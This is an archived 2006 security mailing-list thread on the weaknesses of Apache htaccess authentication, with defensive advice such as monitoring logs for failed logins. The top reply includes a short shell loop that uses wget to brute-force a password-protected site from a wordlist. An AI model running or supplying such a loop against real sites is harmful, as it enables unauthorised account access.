Re: Web Authentication

[streck () papafloh de (Florian Streck)]

Please use such programs only if you have a permission from the
target.site. Anything else would be very unpolite.

cat passwordfile | while read $PASSWORD ; do
        echo trying: $PASSWORD
        wget -q --user=USERNAME --password=$PASSWORD http://target.site/
        if [ $? -eq 0 ] ; then
                echo $PASSWORD
                break
        fi
done


On Fri, Jul 28, 2006 at 07:58:22AM +0300, pimp mastermind wrote:
> Hi there... do you know some software or exploit or whatever which can
> make a brute force attack to htaccess? i just want to see how it works
> or if there is some web site with more detailed information about this
> kind of attack (brute force) ...actually i know how its work when you
> try to compromise some work station but i never knew how it works with
> htaccess. Thanks all
>
> On 7/27/06, Florian Streck <streck () papafloh de> wrote:
> > On Mon, Jul 24, 2006 at 10:54:46AM +0300, Maxim Kostyukov wrote:
> > > What exactly you want to achieve by doing "better web authentication"?
> > > In you case, what are those weaknesses with htpasswd scheme?
> >
> > Well the problem with htaccess is that there is no mechanism that
> > checks for the number of trials or failures.
> > So you can brute-force your way in.
> >
> > > I am asking because it is almost impossible to answer your question
> > > without additional info.
> > >
> > > ----- Original Message -----
> > > From: "pimp mastermind" <gbchustla () gmail com>
> > > To: <security-basics () securityfocus com>
> > > Sent: Thursday, July 20, 2006 7:36 AM
> > > Subject: Web Authentication
> > >
> > >
> > > > I have Slackware 10.1 runing. I am using it as a router and
> > > > fileserver. I use Apache 1.3 for web access. I have some web
> > > > directories which i want to secure more strongly than with htpasswd
> > > > but i dont know any other ways of authentication. Also a lot of my
> > > > scripts in those directories are wirted in PHP Perl and CGI scripting.
> > > > I need to find a better way of authentication? Does any one knows any
> > > > better way of authentication?
> > > > Thank you all in advance for your help
> >
> > You could for example write a script that checks the logfiles for failed 
> > access
> > attempts and if there are to many restrict the access permissions for
> > the directories.
> > Otherwise you have to use scripts that provide the content of the
> > directories.
> >
> >
> >
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.1 (GNU/Linux)
> >
> > iD8DBQFEyJFrIXCBARCXXgwRAtD+AKCBShe/vqtLI2nEh08sLJLeKZRPggCcCJx7
> > 0UHI6UBCVP4mo7fNdm479Es=
> > =/Vzg
> > -----END PGP SIGNATURE-----

-- 
Sabberle:
Im Sommer schwitzt der Mensch sich tot, und ist er nackt so wird er rot.

Attachment: signature.asc
Description: Digital signature